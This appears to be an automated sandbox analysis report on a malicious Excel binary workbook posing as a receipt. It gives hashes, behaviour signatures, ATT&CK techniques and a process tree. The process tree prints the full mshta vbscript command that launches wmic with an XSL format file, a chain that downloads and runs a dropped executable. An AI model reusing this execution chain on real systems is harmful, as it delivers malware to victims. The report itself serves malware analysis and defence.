Analysis

  • max time kernel
    142s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    06-07-2021 15:05

General

  • Target

    Reciept 9133447.xlsb

  • Size

    67KB

  • MD5

    c44c8e5c2b7ed4b597557bf12cc279c4

  • SHA1

    bf99994ffb3cd21635e1ef7f09e773e48068d3c1

  • SHA256

    e9157e32da346917b0092b432ede9945fa6d86ceccc07e0afa1e33826a3fecab

  • SHA512

    694058e46ac7b324e4df54e11ceba4ed92a40878f934f9369059905acc264d48c3ec888f52e7fb20e8931d62b0a22121efdf13167da8fe82b512d90ecdc77233

Score
9/10

Malware Config

Signatures

  • CryptOne packer 2 IoCs

    Detects CryptOne packer defined in NCC blogpost.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Reciept 9133447.xlsb"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4432
  • \??\c:\windows\system32\mshta.EXE
    c:\windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\qDialogOptionsCalculation.xsl"" & Chr(34)),0:close")
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1428
    • C:\Windows\System32\wbem\WMIC.exe
      "C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\qDialogOptionsCalculation.xsl"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1704
      • C:\Windows\Temp\98svw.exe
        "C:\Windows\Temp\98svw.exe"
        3⤵
        • Executes dropped EXE
        PID:2700

Network

MITRE ATT&CK Matrix ATT&CK v6

  • Discovery
    • System Information Discovery, T1082 (3)
    • Query Registry, T1012 (2)

Downloads

  • C:\ProgramData\qDialogOptionsCalculation.xsl
    MD5

    620bf55623214f88f930947072f5f85e

    SHA1

    e6d49a4bad59023d69653186a8193340d4b54adb

    SHA256

    144d5d7cc423e850a7ae9599fffeaed84e9ee5a882330f38a295381fe5263c7b

    SHA512

    87a8443c3477dcd3cc1a3ddfc1ce53031e1bcc82ee141946ef1da944c60207e22798efe625fef19cbd66a10f44972f3e2626166b9953f4b18608bbd3996e91e1

  • C:\Windows\Temp\98svw.exe
    MD5

    9a2e1bb9ad6f1ccfeaa4c2c55637ae3b

    SHA1

    d42d55cab8637f847efdc1a01bcd5bb2d4668b7d

    SHA256

    b012145b80d5176d73ed67924be9b1290d7920f05bf436f37deca4799b6d88b6

    SHA512

    c8233171f957979936ea517dcabb3732e54b1cc19e89853d198b48c36f9609d2d8d0a0e75267a63162bd7d40371d22fbc62084441eaaec4d8670a5c2d985d1a6

  • memory/1704-179-0x0000000000000000-mapping.dmp
  • memory/2700-181-0x0000000000000000-mapping.dmp
  • memory/4432-118-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
    Filesize

    64KB

  • memory/4432-121-0x00007FF9D4FA0000-0x00007FF9D608E000-memory.dmp
    Filesize

    16.9MB

  • memory/4432-123-0x00007FF9D30A0000-0x00007FF9D4F95000-memory.dmp
    Filesize

    31.0MB

  • memory/4432-122-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
    Filesize

    64KB

  • memory/4432-117-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
    Filesize

    64KB

  • memory/4432-114-0x00007FF6FCF40000-0x00007FF7004F6000-memory.dmp
    Filesize

    53.7MB

  • memory/4432-116-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
    Filesize

    64KB

  • memory/4432-115-0x00007FF9B4570000-0x00007FF9B4580000-memory.dmp
    Filesize

    64KB